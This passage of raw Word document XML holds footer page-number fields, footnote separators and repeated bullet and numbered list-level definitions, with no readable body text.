    <w:r w:rsidRPr="00186075">
      <w:rPr>
        <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
        <w:sz w:val="16"/>
        <w:lang w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E13954">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>17</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="1504E947" w14:textId="77777777" w:rsidR="00C07D0E" w:rsidRPr="008F1B32" w:rsidRDefault="00C07D0E">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Palatino Linotype" w:hAnsi="Palatino Linotype"/>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20F26" w14:textId="77777777" w:rsidR="0036631C" w:rsidRDefault="0036631C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42F37BAF" w14:textId="77777777" w:rsidR="0036631C" w:rsidRDefault="00366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A133"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="B450FAAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="32B817FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EA14887E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D074A04E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="52DE6528">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="435A2C66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="91C232A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9B466932">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="394C8A04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0224CCA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7F40539A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A4F4C630">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9DE223C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9BC09C9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C5DE7510">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="634A72FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1CE4BB90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FBAED100">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6458FEDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="034F2F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56ECEDAA"/>
    <w:lvl w:ilvl="0" w:tplc="23025EBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="103410BE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8EA24DCE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="55EA4A52" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9B4C4D6E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F6826FEA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C0B8CD32" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B0567BF8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6FEC0DDC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0528E913"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="19D8ED0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FA9E0F5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="69D6B2AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5AC4A64E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AEDA6E10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BB5E8064">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0CAC7736">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D1BE1E0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C6DA3DE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="076B8795"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="359888E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3BB613EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5DFE4528">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="814A81C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0DA619BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="374CE60C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1C7077A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="160ABBE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BAC49BF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="08D3E8B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="B0BC9B06">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C9D0BDA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D1A41454">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="564867AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9612A53C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6A860FB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="15825E7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="197C3136">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6F241752">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09C642B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="042C50C0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="56B02948">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="09C65D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FA5088C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="29F05C8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C98A2E3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5F604A5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BD4CBB0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5A6BA4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B3179A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="8E8AF13A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D67E5D62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D80C041C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0666F846">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59EE9008">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3072DA38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
